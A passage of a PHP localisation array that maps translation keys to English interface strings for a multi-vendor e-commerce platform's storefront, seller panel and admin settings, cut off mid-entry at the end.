'check_orders' => 'Check orders', 'your_order_has_been_placed_successfully!' => 'Your order has been placed successfully!', 'order_no' => 'Order no', 'order_date' => 'Order date', 'Item' => 'Item', 'generate_invoice' => 'Generate invoice', 'coupon_discount' => 'Coupon discount', 'Seller_Details' => 'Seller Details', 'inhouse_shipping_method' => 'Inhouse shipping method', 'WISHLIST' => 'WISHLIST', 'successfully_added' => 'Successfully added', 'out_of_stock!' => 'Out of stock!', 'successfully_added!' => 'Successfully added!', 'already_added!' => 'Already added!', 'please_choose_all_the_options' => 'Please choose all the options', 'successfully_updated!' => 'Successfully updated!', 'successfully_removed' => 'Successfully removed', 'order_can_be_canceled_only_when_pending.' => 'Order can be canceled only when pending.', 'you_can_review_after_product_is_delivered!' => 'You can review after product is delivered!', 'you_can_review_after_the_product_is_delivered!' => 'You can review after the product is delivered!', 'shipping_id_is_required' => 'Shipping id is required', 'General Info' => 'General Info', 'maintenance_mode' => 'Maintenance mode', 'Currency Symbol Position' => 'Currency Symbol Position', 'gateway' => 'Gateway', 'setup' => 'Setup', 'releans_sms' => 'Releans sms', 'active' => 'Active', 'inactive' => 'Inactive', 'otp_template' => 'Otp template', 'twilio_sms' => 'Twilio sms', 'sid' => 'Sid', 'messaging_service_sid' => 'Messaging service sid', 'token' => 'Token', 'nexmo_sms' => 'Nexmo sms', 'api_secret' => 'Api secret', '2factor_sms' => '2factor sms', 'msg91_sms' => 'Msg91 sms', 'template_id' => 'Template id', 'authkey' => 'Authkey', 'time' => 'Time', 'linked_orders' => 'Linked orders', 'order' => 'Order', 'qty' => 'Qty', 'Details' => 'Details', 'order_id' => 'Order id', 'transaction_table' => 'Transaction table', 'payment_for' => 'Payment for', 'payer_id' => 'Payer id', 'payment_receiver_id' => 'Payment receiver id', 'paid_by' => 'Paid by', 'paid_to' => 'Paid to', 'payment_status' => 'Payment status', 'shop_does_not_exist' => 'Shop does not exist', 'Transactions' => 'Transactions', 'payer_info' => 'Payer info', 'receiver_info' => 'Receiver info', 'check_your_email' => 'Check your email', 'verify_information_to_continue' => 'Verify information to continue', 'verification_code' => 'Verification code', 'OTP' => 'OTP', 'verify' => 'Verify', 'please' => 'Please', 'provide' => 'Provide', 'verification' => 'Verification', 'sent_in_your_email' => 'Sent in your email', 'verification_done_successfully' => 'Verification done successfully', 'on' => 'On', 'off' => 'Off', 'email' => 'Email', 'order_verification_code' => 'Order verification code', 'Confirmed' => 'Confirmed', 'Canceled' => 'Canceled', 'registration_success_login_now' => 'Registration success login now', 'please_check_your_SMS_for_OTP' => 'Please check your SMS for OTP', 'sent_in_your_phone' => 'Sent in your phone', 'seller_is' => 'Seller is', 'customer' => 'Customer', 'order_amount' => 'Order amount', 'seller_amount' => 'Seller amount', 'admin_commission' => 'Admin commission', 'received_by' => 'Received by', 'delivered_by' => 'Delivered by', 'delivery_charge' => 'Delivery charge', 'tax' => 'Tax', 'wallet_statistics' => 'Wallet statistics', 'proceed' => 'Proceed', 'select_status' => 'Select status', 'disburse' => 'Disburse', 'hold' => 'Hold', 'seller_name' => 'Seller name', 'transaction_id' => 'Transaction id', 'unpaid' => 'Unpaid', 'sub_sub_category_form' => 'Sub sub category form', 'main' => 'Main', 'sub_sub_category_table' => 'Sub sub category table', 'sub_sub_category_name' => 'Sub sub category name', 'variation' => 'Variation', 'admin_wallet' => 'Admin wallet', 'commission_earned' => 'Commission earned', 'delivery_charge_earned' => 'Delivery charge earned', 'pending_amount' => 'Pending amount', 'total_tax_collected' => 'Total tax collected', 'flash_deal_b' => 'Flash deal b', 'want_tocancel_this_order ' => 'Want tocancel this order ', 'want_to_cancel_this_order ' => 'Want to cancel this order ', 'country' => 'Country', 'loader_gif' => 'Loader gif', 'commission_given' => 'Commission given', 'pending_withdraw' => 'Pending withdraw', 'total_withdraw' => 'Total withdraw', 'collected_cash' => 'Collected cash', 'total_collected_tax' => 'Total collected tax', 'Withdrawable_balance' => 'Withdrawable balance', 'login_first_for_next_steps' => 'Login first for next steps', 'shipping' => 'Shipping', 'method' => 'Method', 'processing' => 'Processing', 'payment' => 'Payment', 'pagination' => 'Pagination', 'settings' => 'Settings', 'seller_wallet' => 'Seller wallet', 'Application' => 'Application', 'Repeat' => 'Repeat', 'not match' => 'Not match', 'Apply' => 'Apply', 'Seller_request_for_open_a_shop.' => 'Seller request for open a shop.', 'Approve' => 'Approve', 'reject' => 'Reject', 'activate' => 'Activate', 'in-house_earning' => 'In-house earning', 'earning_statistics_for_business_analytics' => 'Earning statistics for business analytics', 'this_year_earning' => 'This year earning', 'seller_earnings' => 'Seller earnings', 'attribute' => 'Attribute', 'brand_list' => 'Brand list', 'Brand_update' => 'Brand update', 'brand_logo' => 'Brand logo', 'deny' => 'Deny', 'denied_note' => 'Denied note', 'Color' => 'Color', 'Total Price' => 'Total Price', 'phone_number' => 'Phone number', 'country_code_is_must' => 'Country code is must', 'profile_Info' => 'Profile Info', 'change_your_profile' => 'Change your profile', 'account_information' => 'Account information', 'new_password' => 'New password', 'shop_cart' => 'Shop cart', 'minimum_8_characters_long' => 'Minimum 8 characters long', 'contact_bold' => 'Contact bold', 'send_us_a_message' => 'Send us a message', 'your_name' => 'Your name', 'your_phone' => 'Your phone', 'Message' => 'Message', 'chat_with_seller' => 'Chat with seller', 'best_sellings' => 'Best sellings', 'Order_Management' => 'Order Management', 'Product_Management' => 'Product Management', 'Business_Section' => 'Business Section', 'user_Section' => 'User Section', 'Support_Section' => 'Support Section', 'Business_Settings' => 'Business Settings', 'Web_&_App_Settings' => 'Web & App Settings', 'Report_&_Analytics' => 'Report & Analytics', 'Employee_Section' => 'Employee Section', 'like_for_BD_880' => 'Like for BD 880', 'resubmit' => 'Resubmit', 'text_updated_successfully' => 'Text updated successfully', 'date' => 'Date', 'invoice_to' => 'Invoice to', 'no.' => 'No.', 'item_description' => 'Item description', 'unit_price' => 'Unit price', 'payment_details' => 'Payment details', 'sub_total' => 'Sub total', 'discount_on_product' => 'Discount on product', 'website' => 'Website', 'dashboard' => 'Dashboard', 'track_your_order' => 'Track your order', 'review' => 'Review', 'variant' => 'Variant', 'free_delivery' => 'Free delivery', 'money_back_gurranty' => 'Money back gurranty', 'days' => 'Days', 'money_back_guarantee' => 'Money back guarantee', 'genuine' => 'Genuine', 'authentic_payment' => 'Authentic payment', 'disabled' => 'Disabled', 'total_business_overview' => 'Total business overview', 'store' => 'Store', 'business' => 'Business', 'sold' => 'Sold', 'earning' => 'Earning', 'commission' => 'Commission', 'your_phone_number' => 'Your phone number', 'show_data_by_date_range' => 'Show data by date range', 'total_sale_of' => 'Total sale of', 'your_email' => 'Your email', 'welcome_back_to_seller_login' => 'Welcome back to seller login', 'view' => 'View', 'cancel' => 'Cancel', 'stock_out' => 'Stock out', 'hello' => 'Hello', 'reviews' => 'Reviews', 'color' => 'Color', 'please_provide_coupon_code' => 'Please provide coupon code', 'apply_code' => 'Apply code', 'discount' => 'Discount', 'total_price' => 'Total price', 'add_to_cart' => 'Add to cart', 'repeat_password' => 'Repeat password', 'shop_name' => 'Shop name', 'shop_address' => 'Shop address', 'already_have_an_account _login.' => 'Already have an account login.', 'order_list' => 'Order list', 'inhouse_orders_only' => 'Inhouse orders only', 'processed' => 'Processed', 'order_filter_success' => 'Order filter success', 'Push Notification Setup' => 'Push Notification Setup', 'Firebase Push Notification Setup' => 'Firebase Push Notification Setup', 'Server Key' => 'Server Key', 'FCM Project ID' => 'FCM Project ID', 'Push Messages' => 'Push Messages', 'Order Pending Message' => 'Order Pending Message', 'Order Confirmation Message' => 'Order Confirmation Message', 'Order Processing Message' => 'Order Processing Message', 'Order out for delivery Message' => 'Order out for delivery Message', 'Order Delivered Message' => 'Order Delivered Message', 'Order Returned Message' => 'Order Returned Message', 'Order Failed Message' => 'Order Failed Message', 'sub_category_form' => 'Sub category form', 'sub_category_table' => 'Sub category table', 'Sub Category deleted Successfully.' => 'Sub Category deleted Successfully.', 'Search by Sub Sub Category' => 'Search by Sub Sub Category', 'Are you sure to delete this ' => 'Are you sure to delete this ', 'You wont be able to revert this!' => 'You wont be able to revert this!', 'Yes delete it!' => 'Yes delete it!', 'Sub Sub Category deleted Successfully.' => 'Sub Sub Category deleted Successfully.', 'Are you sure ' => 'Are you sure ', 'Category deleted Successfully.' => 'Category deleted Successfully.', 'send' => 'Send', 'Your Message Send Successfully' => 'Your Message Send Successfully', 'Expand menu' => 'Expand menu', 'view_more' => 'View more', 'select_shipping_method_first' => 'Select shipping method first', 'Shipping Address Choose' => 'Shipping Address Choose', 'Admin or Employee Login' => 'Admin or Employee Login', 'seller_login' => 'Seller login', 'drop_here' => 'Drop here', 'input_png_or_jpg' => 'Input png or jpg', 'file_size_too_big' => 'File size too big', 'paymob_accept' => 'Paymob accept', 'configure' => 'Configure', 'iframe_id' => 'Iframe id', 'integration_id' => 'Integration id', 'HMAC' => 'HMAC', 'EGP_currency_is_required' => 'EGP currency is required', 'write_something' => 'Write something', 'Enter_Attribute_Name' => 'Enter Attribute Name', 'Search_by_Attribute_Name' => 'Search by Attribute Name', 'Are_you_sure_to_delete_this' => 'Are you sure to delete this', 'You_will not_be_able_to_revert_this' => 'You will not be able to revert this', 'Yes' => 'Yes', 'delete_it' => 'Delete it', 'Attribute_deleted_successfully' => 'Attribute deleted successfully', 'Search_by_Banner_Type' => 'Search by Banner Type', 'Banner_published_successfully' => 'Banner published successfully', 'Banner_unpublished_successfully' => 'Banner unpublished successfully', 'Are_you_sure_delete_this_banner' => 'Are you sure delete this banner', 'You_will_not_be_able_to_revert_this' => 'You will not be able to revert this', 'Banner_deleted_successfully' => 'Banner deleted successfully', 'Main_Banner_updated_Successfully' => 'Main Banner updated Successfully', 'Secondary_Banner_updated_Successfully' => 'Secondary Banner updated Successfully', 'Popup_Banner_updated_Successfully' => 'Popup Banner updated Successfully', 'Ex' => 'Ex', 'LUX' => 'LUX', 'are_you_sure ' => 'Are you sure ', 'You_will_not_be_able_to_revert_this!' => 'You will not be able to revert this!', 'Brand_deleted_successfully' => 'Brand deleted successfully', 'Brands' => 'Brands', 'Are_you_sure_delete_this_brand' => 'Are you sure delete this brand', 'Are_you_sure' => 'Are you sure', 'Category_deleted_Successfully.' => 'Category deleted Successfully.', 'Sub_Category' => 'Sub Category', 'Search_by_Sub_Category' => 'Search by Sub Category', 'Are_you_sure_to_delete_this_sub_category' => 'Are you sure to delete this sub category', 'Sub_Category_deleted_Successfully.' => 'Sub Category deleted Successfully.', 'New_Sub_Sub_Category' => 'New Sub Sub Category', 'Search_by_Sub_Sub_Category' => 'Search by Sub Sub Category', 'Are_you_sure_to_delete_this ' => 'Are you sure to delete this ', 'You_wont_be_able_to_revert_this!' => 'You wont be able to revert this!', 'Sub_Sub_Category_Deleted_Successfully' => 'Sub Sub Category Deleted Successfully', 'paymob_supports_EGP_currency' => 'Paymob supports EGP currency', 'coupon_code' => 'Coupon code', 'Overall Statistics' => 'Overall Statistics', 'Todays Statistics' => 'Todays Statistics', 'This Months Statistics' => 'This Months Statistics', 'Withdraw Request' => 'Withdraw Request', 'Request' => 'Request', 'Earning statistics for business analytics' => 'Earning statistics for business analytics', 'This Year Earning' => 'This Year Earning', 'Your Earnings' => 'Your Earnings', 'Commission Given' => 'Commission Given', 'Update your bank info first!' => 'Update your bank info first!', 'Order Details' => 'Order Details', 'Order details' => 'Order details', 'Print invoice' => 'Print invoice', 'Q' => 'Q', 'Contact info' => 'Contact info', 'Are you sure Change this ' => 'Are you sure Change this ', 'Status Change successfully' => 'Status Change successfully', 'Yes Change it!' => 'Yes Change it!', 'Order is already delivered You can not change it !!' => 'Order is already delivered You can not change it !!', 'Status Change successfully !' => 'Status Change successfully !', 'Product List' => 'Product List', 'Status updated successfully' => 'Status updated successfully', 'Status updated failed. Product must be approved' => 'Status updated failed. Product must be approved', 'Please only input png or jpg type file' => 'Please only input png or jpg type file', 'File size too big' => 'File size too big', 'product updated successfully!' => 'Product updated successfully!', 'Meta Title' => 'Meta Title', 'Meta Description' => 'Meta Description', 'Meta Image' => 'Meta Image', 'optional please provide embed link not direct link.' => 'Optional please provide embed link not direct link.', 'Remove' => 'Remove', 'Instructions' => 'Instructions', 'Download the format file and fill it with proper data' => 'Download the format file and fill it with proper data', 'You can download the example file to understand how the data must be filled' => 'You can download the example file to understand how the data must be filled', 'Once you have downloaded and filled the format file upload it in the form below and submit' => 'Once you have downloaded and filled the format file upload it in the form below and submit', 'After uploading products you need to edit them and set products images and choices' => 'After uploading products you need to edit them and set products images and choices', 'You can get brand and category id from their list please input the right ids' => 'You can get brand and category id from their list please input the right ids', 'Import Products File' => 'Import Products File', 'Download Format' => 'Download Format', 'Review List' => 'Review List', 'Product reviews' => 'Product reviews', 'star' => 'Star', 'Current Stock' => 'Current Stock', 'Available color' => 'Available color', 'Product Image' => 'Product Image', 'Reviewer' => 'Reviewer', 'Chatting List' => 'Chatting List', 'edit' => 'Edit', 'Bank info' => 'Bank info', 'Edit Bank Info' => 'Edit Bank Info', 'Bank Name' => 'Bank Name', 'Branch Name' => 'Branch Name', 'Holder Name' => 'Holder Name', 'Account No' => 'Account No', 'Edit Shop Info' => 'Edit Shop Info', 'Shop Name' => 'Shop Name', 'Address' => 'Address', 'Ratio' => 'Ratio', 'Are you sure delete this ' => 'Are you sure delete this ', 'Shipping Method deleted successfully' => 'Shipping Method deleted successfully', 'Once deleted you will not be able to recover this' => 'Once deleted you will not be able to recover this', 'warning' => 'Warning', 'FAQ' => 'FAQ', 'frequently_asked_question' => 'Frequently asked question', 'Track Order Result' => 'Track Order Result', 'My Wishlists' => 'My Wishlists', 'Image ratio should be' => 'Image ratio should be', 'add_new_address' => 'Add new address', 'permanent' => 'Permanent', 'Office' => 'Office', 'State' => 'State', 'ADDRESSES' => 'ADDRESSES', 'My Support Tickets' => 'My Support Tickets', 'submit_new_ticket' => 'Submit new ticket', 'you_will_get_response' => 'You will get response', 'problem' => 'Problem', 'partner_request' => 'Partner request', 'Complaint' => 'Complaint', 'inquiry' => 'Inquiry', 'choose_priority' => 'Choose priority', 'Urgent' => 'Urgent', 'High' => 'High', 'Medium' => 'Medium', 'Low' => 'Low', 'describe_your_issue' => 'Describe your issue', 'submit_a_ticket' => 'Submit a ticket', 'Topic' => 'Topic', 'submition_date' => 'Submition date', 'add_new_ticket' => 'Add new ticket', 'Welcome To' => 'Welcome To', 'Previous' => 'Previous', 'All Brands Page' => 'All Brands Page', 'items found' => 'Items found', 'All Category Page' => 'All Category Page', 'Select your desire category' => 'Select your desire category', 'View Products' => 'View Products', 'Contact Us' => 'Contact Us', 'Contact Number' => 'Contact Number', 'Short title' => 'Short title', 'Privacy policy' => 'Privacy Policy', 'Terms & Conditions' => 'Terms & Conditions', 'Terms and Condition' => 'Terms and Conditions', 'About Us' => 'About Us', 'About Our Company' => 'About Our Company', 'My Address' => 'My Address', 'No data found' => 'No data found', 'My Order List' => 'My Order List', 'updated_successfully' => 'Updated successfully', 'No conversetion found' => 'No conversetion found', 'shipping_method_update' => 'Shipping method update', 'Admin | Login' => 'Admin | Login', 'Software version' => 'Software version', 'Search orders' => 'Search orders', 'Search Product Name' => 'Search Product Name', 'Featured status updated successfully' => 'Featured status updated successfully', 'New Product' => 'New Product', 'EX' => 'EX', 'After uploading products you need to edit them and set product images and choices' => 'After uploading products you need to edit them and set product images and choices', 'No data to show' => 'No data to show', 'Product in wishlist report' => 'Product in wishlist report', 'In-House' => 'In-House', 'Filter' => 'Filter', 'Asc/Dsc' => 'Asc/Dsc', 'Total in Wishlist' => 'Total in Wishlist', 'Discount_on_Purchase' => 'Discount on Purchase', 'start date' => 'Start date', 'expire date' => 'Expire date', 10 => '10', 'minimum purchase' => 'Minimum purchase', 'maximum discount' => 'Maximum discount', 'Search by Title or Code or Discount Type' => 'Search by Title or Code or Discount Type', 'New notification' => 'New notification', 'Choose file' => 'Choose file', 'Search by Title' => 'Search by Title', 'Are you sure delete this' => 'Are you sure delete this', 'You will not be able to revert this' => 'You will not be able to revert this', 'Yes delete it' => 'Yes delete it', 'notification deleted successfully' => 'Notification deleted successfully', 'Add new' => 'Add new', 'Add Product' => 'Add Product', 'Deal of the day form' => 'Deal of the day form', 'Product stock report' => 'Product stock report', 'ASE/DESC' => 'ASE/DESC', 'Total Stock' => 'Total Stock', 'Search by Product or Customer' => 'Search by Product or Customer', 'Search by Name or Phone or Email' => 'Search by Name or Phone or Email', 'Search by Name or Email or Phone' => 'Search by Name or Email or Phone', 'Search_by_Name_or_Mobile_No_or_Email' => 'Search by Name or Mobile No or Email', 'Are_you_sure_delete_this' => 'Are you sure delete this', 'Contact_deleted_successfully' => 'Contact deleted successfully', 'Search by Subject' => 'Search by Subject', 'Default Sales Commission' => 'Default Sales Commission', 'Seller Registration' => 'Seller Registration', 'Seller Registration on/off' => 'Seller Registration on/off', 'Turn on' => 'Turn on', 'Turn off' => 'Turn off', 'Copy URI' => 'Copy URI', 'Copied to the clipboard' => 'Copied to the clipboard', 'EX of SMS provider s template : your OTP is XXXX here please check' => 'EX of SMS provider s template : your OTP is XXXX here please check', 'NB : XXXX will be replace with otp' => 'NB : XXXX will be replace with otp', 'NB : Keep an OTP variable in your SMS providers OTP Template' => 'NB : Keep an OTP variable in your SMS providers OTP Template', 'Shipping Method' => 'Shipping Method', '4 to 6 days' => '4 to 6 days', 'Are you sure to delete this' => 'Are you sure to delete this', 'Credentials SetUp' => 'Credentials SetUp', 'Google API Set up Instructions' => 'Google API Set up Instructions', 'Go to the Credentials page' => 'Go to the Credentials page', 'Click' => 'Click', 'Select the' => 'Select the', 'type' => 'Type', 'Name your OAuth 2.0 client' => 'Name your OAuth 2.0 client', 'provide the' => 'Provide the', 'from below and click' => 'From below and click', 'Copy' => 'Copy', 'paste in the input filed below and' => 'Paste in the input filed below and', 'Close' => 'Close', 'Facebook API Set up Instructions' => 'Facebook API Set up Instructions', 'Log in into your Facebook account (if you’re not)' => 'Log in into your Facebook account (if you’re not)', 'Go to the facebook developer page and' => 'Go to the facebook developer page and', 'Go to' => 'Go to', 'from Navbar' => 'From Navbar', 'From Register tab press' => 'From Register tab press', 'From Verify Account tab' => 'From Verify Account tab', 'provide phone number & press' => 'Provide phone number & press', 'An' => 'An', 'will be sent to your number provide that' => 'Will be sent to your number provide that', 'and press' => 'And press', 'From Contact Info tab provide' => 'From Contact Info tab provide', 'check in' => 'Check in', 'From About You tab press' => 'From About You tab press', 'Select an app type' => 'Select an app type', 'Complete the' => 'Complete the', 'form & press' => 'Form & press', 'From' => 'From', 'press' => 'Press', 'Provide' => 'Provide', 'Now go to' => 'Now go to', 'from left sidebar' => 'From left sidebar', 'Fill the form and press' => 'Fill the form and press', 'toggle button from the top' => 'Toggle button from the top', 'Now copy' => 'Now copy', 'Twitter API Set up Instructions' => 'Twitter API Set up Instructions', 'Instruction will be available very soon' => 'Instruction will be available very soon', 'Add New Currency' => 'Add New Currency', 'Enter currency Name' => 'Enter currency Name', 'Enter currency symbol' => 'Enter currency symbol', 'Enter currency code' => 'Enter currency code', 'Enter currency exchange rate' => 'Enter currency exchange rate', 'Search Currency Name or Currency Code' => 'Search Currency Name or Currency Code', 'Default' => 'Default', 'All input field is required' => 'All input field is required', 'Left' => 'Left', 'Right' => 'Right', 'Admin Shop Banner' => 'Admin Shop Banner', '6:1' => '6:1', 'Are you sure' => 'Are you sure', 'Be careful before you turn on/off maintenance mode' => 'Be careful before you turn on/off maintenance mode', 'Both Phone & Email verification can not be active at a time' => 'Both Phone & Email verification can not be active at a time', 'Add Help Topic' => 'Add Help Topic', 'Type Question' => 'Type Question', 'Type Answer' => 'Type Answer', 'Edit Modal Help Topic' => 'Edit Modal Help Topic', 'Are you sure delete this FAQ' => 'Are you sure delete this FAQ', 'FAQ deleted successfully' => 'FAQ deleted successfully', 'Social Media' => 'Social Media', 'Instagram' => 'Instagram', 'Facebook' => 'Facebook', 'Twitter' => 'Twitter', 'LinkedIn' => 'LinkedIn', 'Pinterest' => 'Pinterest', 'Google plus' => 'Google plus', 'Enter Social Media Link' => 'Enter Social Media Link', 'Social Name Is Requeired' => 'Social Name Is Requeired', 'Social Link Is Requeired' => 'Social Link Is Requeired', 'Social Media Already taken' => 'Social Media Already taken', 'Social Media inserted Successfully' => 'Social Media inserted Successfully', 'Social info updated Successfully' => 'Social info updated Successfully', 'Are you sure delete this social media' => 'Are you sure delete this social media', 'Social media deleted Successfully' => 'Social media deleted Successfully', 'Invalid date range' => 'Invalid date range', 'Show data by date range' => 'Show data by date range', 'InHouse product sale report' => 'InHouse product sale report', 'Total Sale' => 'Total Sale', 'Seller product sale report' => 'Seller product sale report', 'My Shopping Cart' => 'My Shopping Cart', 'Something went wrong!' => 'Something went wrong!', 'Please fill all required fields' => 'Please fill all required fields', 'Choose Payment Method' => 'Choose Payment Method', 'Page Not found' => 'Page Not found', 'We are sorry the page you requested could not be found' => 'We are sorry the page you requested could not be found', 'Please go back to the homepage' => 'Please go back to the homepage', 'HOME' => 'HOME', 'Currency changed to' => 'Currency changed to', 'Item has been removed from cart' => 'Item has been removed from cart', 'Sorry the minimum value was reached' => 'Sorry the minimum value was reached', 'Sorry stock limit exceeded' => 'Sorry stock limit exceeded', 'Shop Page' => 'Shop Page', 'Search Product' => 'Search Product', 'send successfully' => 'Send successfully', 'Close sidebar' => 'Close sidebar', 'product added successfully' => 'Product added successfully', 'Are you sure Change this' => 'Are you sure Change this', 'Yes Change it' => 'Yes Change it', 'Order is already delivered You can not change it' => 'Order is already delivered You can not change it', 'Login' => 'Login', 'Please ReType Password' => 'Please ReType Password', 'Passwords do not match' => 'Passwords do not match', 'password Must Be 6 Character' => 'Password Must Be 6 Character', 'Passwords match' => 'Passwords match', 'Ready to Leave' => 'Ready to Leave', 'Select Logout below if you are ready to end your current session' => 'Select Logout below if you are ready to end your current session', 'Logout' => 'Logout', 'Update option is disabled for demo' => 'Update option is disabled for demo', 'Order List' => 'Order List', 'Brand Add' => 'Brand Add', 'Brand List' => 'Brand List', 'Product Bulk Import' => 'Product Bulk Import', 'Coupon Add' => 'Coupon Add', 'Add new notification' => 'Add new notification', 'Flash Deal' => 'Flash Deal', 'Deal Page' => 'Deal Page', 'Feature Deal' => 'Feature Deal', 'Product stock Report' => 'Product stock Report', 'Product in Wishlist Report' => 'Product in Wishlist Report', 'Seller List' => 'Seller List', 'Customer List' => 'Customer List', 'Contact List' => 'Contact List', 'Support Ticket' => 'Support Ticket', 'Seller Information' => 'Seller Information', 'Image uploaded successfully' => 'Image uploaded successfully', 'Error Something went wrong' => 'Error Something went wrong', 'Choose Image' => 'Choose Image', 'This is not an image file' => 'This is not an image file', 'Payment Method' => 'Payment Method', 'SMS Module Setup' => 'SMS Module Setup', 'Social Login' => 'Social Login', 'Web Config' => 'Web Config', 'Mail Config' => 'Mail Config', 'FCM Settings' => 'FCM Settings', 'Terms & Condition' => 'Terms & Conditions', 'Earning Report' => 'Earning Report', 'Order Report' => 'Order Report', 'Inhouse product sale Report' => 'Inhouse product sale Report', 'Seller product sale Report' => 'Seller product sale Report', 'Create Role' => 'Create Role', 'Employee Add' => 'Employee Add', 'Employee List' => 'Employee List', 'Do you want to logout' => 'Do you want to logout', 'Sign out' => 'Sign out', 'Copyright' => 'Copyright', 'Search by Product Name' => 'Search by Product Name', 'New Request' => 'New Request', 'Want to delete this item' => 'Want to delete this item', 'Chatting Page' => 'Chatting Page', 'Send a message' => 'Send a message', 'No Message available' => 'No Message available', 'Bank Info View' => 'Bank Info View', 'Shop view' => 'Shop view', 'no_items_in_basket' => 'No items in basket', 'Flash Deal Products' => 'Flash Deal Products', 'Are you sure you want to Delete' => 'Are you sure you want to Delete', 'Address Update Successfully' => 'Address Update Successfully', 'All input field required' => 'All input field required', 'Do you want to delete this ' => 'Do you want to delete this ', 'Language Translate' => 'Language Translate', 'Key removed successfully' => 'Key removed successfully', 'Search by orders id or transaction id' => 'Search by orders id or transaction id', 'Expand cart' => 'Expand cart', 'Checkout' => 'Checkout', 'Coupon code' => 'Coupon code', 'Credit / Debit card ( Stripe )' => 'Credit / Debit card ( Stripe )', 'Error' => 'Error', 'No Product Found' => 'No Product Found', 'All Seller Page' => 'All Seller Page', 'Shop name' => 'Shop name', 'All_Sellers' => 'All Sellers', 'all' => 'All', 'View_more' => 'View more', 'Flash Deal Update' => 'Flash Deal Update', 'Update Deal' => 'Update Deal', 'Feature Deal Update' => 'Feature Deal Update', 'Deal Update' => 'Deal Update', 'Deal of the Day' => 'Deal of the Day', 'Deal Product' => 'Deal Product', 'Order is already delivered and transaction amount has been disbursed changing status can be the reason of miscalculation' => 'Order is already delivered and transaction amount has been disbursed changing status can be the reason of miscalculation', 'Think before you proceed' => 'Think before you proceed', 'GST' => 'GST', 'comment' => 'Comment', 'attachment' => 'Attachment', 'Top' => 'Top', 'admin@admin.com' => 'Admin@admin.com', 12345678 => '12345678', 'successfully updated!' => 'Successfully updated!', 'Product ID is required!' => 'Product ID is required!', 'Order Placed' => 'Order Placed', 'Notification mail for order placed' => 'Notification mail for order placed', 'We have sent you this email in response to your order placed. You will be able to see your order status after login to your account' => 'We have sent you this email in response to your order placed. You will be able to see your order status after login to your account', 'Your order ID' => 'Your order ID', 'If you need help or you have any other questions feel free to email us' => 'If you need help or you have any other questions feel free to email us', 'successfully added!' => 'Successfully added!', 'order_placed_successfully' => 'Order placed successfully', 'Invalid credential or account no verified yet' => 'Invalid credential or account no verified yet', 'Copied successfully' => 'Copied successfully', 'Product Edit' => 'Product Edit', 'successfully product updated!' => 'Successfully product updated!', 'We are sorry server is not responding' => 'We are sorry server is not responding', 'Try after sometime' => 'Try after sometime', 'Product Add' => 'Product Add', 'Your existing session token does not authorize you any more' => 'Your existing session token does not authorize you any more', 'Seller Apply' => 'Seller Apply', 'Customer_not_found_or_Account_has_been_suspended' => 'Customer not found or Account has been suspended', 'Shop Edit' => 'Shop Edit', 'Add Shipping' => 'Add Shipping', 'No conversation found' => 'No conversation found', 'out_of_stock' => 'Out of stock', 'Profile Settings' => 'Profile Settings', 'Nav menu' => 'Nav menu', 'Basic' => 'Basic', 'Full' => 'Full', 'Your first name' => 'Your first name', 'Optional' => 'Optional', 'Enter new email address' => 'Enter new email address', 'Save changes' => 'Save changes', 'Change' => 'Change', 'your' => 'Your', 'Enter new password' => 'Enter new password', 'Confirm' => 'Confirm', 'Confirm your new password' => 'Confirm your new password', 'changes' => 'Changes', 'Register' => 'Register', 'Please enter your first name' => 'Please enter your first name', 'Please enter your last name' => 'Please enter your last name', 'Please enter valid email address' => 'Please enter valid email address', 'Please enter your phone number' => 'Please enter your phone number', 'Customer Details' => 'Customer Details', 'Customers' => 'Customers', 'Customer details' => 'Customer details', 'Customer ID' => 'Customer ID', 'Joined At' => 'Joined At', 'Order ID' => 'Order ID', 'First name is required!' => 'First name is required!', 'Last name is required!' => 'Last name is required!', 'not_found' => 'Not found', 'Update Currency' => 'Update Currency', 'Currency Name' => 'Currency Name', 'Currency Symbol' => 'Currency Symbol', 'Currency Code' => 'Currency Code', 'Exchange Rate' => 'Exchange Rate', 'Bank Info' => 'Bank Info', 'Back to Shipping' => 'Back to Shipping', 'Order Complete' => 'Order Complete', 'You order has been confirmed and will be shipped according to the method you selected!' => 'You order has been confirmed and will be shipped according to the method you selected!', 'Track Order' => 'Track Order', 'order_status' => 'Order status', 'estimated_delivery_date' => 'Estimated delivery date', 'first_step' => 'First step', 'order_placed' => 'Order placed', 'second_step' => 'Second step', 'processing_order' => 'Processing order', 'third_step' => 'Third step', 'product_on_delivery' => 'Product on delivery', 'fourth_step' => 'Fourth step', 'product_dispatched' => 'Product dispatched', 'Product Preview' => 'Product Preview', '5 star' => '5 star', '4 star' => '4 star', '3 star' => '3 star', '2 star' => '2 star', '1 star' => '1 star', 'Invoice' => 'Invoice', 'Cart key or ID is required!' => 'Cart key or ID is required!', 'Delivery status updated to' => 'Delivery status updated to', 'order is already delivered' => 'Order is already delivered', 'Invalid withdraw request' => 'Invalid withdraw request', 'forgot_password ' => 'Forgot password ', 'follow_steps' => 'Follow steps', 'Fill in your email address below' => 'Fill in your email address below', 'We will send email you a temporary code' => 'We will send email you a temporary code', 'Use the code to change your password on our secure website' => 'Use the code to change your password on our secure website', 'Enter your email address' => 'Enter your email address', 'Please provide valid email address' => 'Please provide valid email address', 'Get new password' => 'Get new password', 'login_first' => 'Login first', 'Support Tickets' => 'Support Tickets', 'Leave a Message' => 'Leave a Message', 'Please write the message' => 'Please write the message', 'Submit Reply' => 'Submit Reply', 'Shipping Method Update' => 'Shipping Method Update', '10 $' => '10 $', 'Product added successfully!' => 'Product added successfully!', 'Edit Shipping' => 'Edit Shipping', 'empty_cart' => 'Empty cart', 'Incomplete bank info' => 'Incomplete bank info', 'Product name is required!' => 'Product name is required!', 'category is required!' => 'Category is required!', 'Product images is required!' => 'Product images is required!', 'Product thumbnail is required!' => 'Product thumbnail is required!', 'brand is required!' => 'Brand is required!', 'Unit is required!' => 'Unit is required!', 'successfully product added!' => 'Successfully product added!', 'Withdraw information View' => 'Withdraw information View', 'Note' => 'Note', 'Withdraw request process' => 'Withdraw request process', 'Deny' => 'Deny', 'Note about transaction or request' => 'Note about transaction or request', 'Brand Edit' => 'Brand Edit', 'successfully removed!' => 'Successfully removed!', 'Info updated successfully!' => 'Info updated successfully!', 'Change status to paid' => 'Change status to paid', 'successfully review submitted!' => 'Successfully review submitted!', 'Maintenance Mode on' => 'Maintenance Mode on', 'Website is under Maintenance' => 'Website is under Maintenance', 'Plese come back later' => 'Plese come back later', 'no_order_found' => 'No order found', 'Discount can not be more or equal to the price!' => 'Discount can not be more or equal to the price!', 'sent' => 'Sent', 'successfully_canceled' => 'Successfully canceled', 'Order Table' => 'Order Table', 'No such data found!' => 'No such data found!', 'Already in 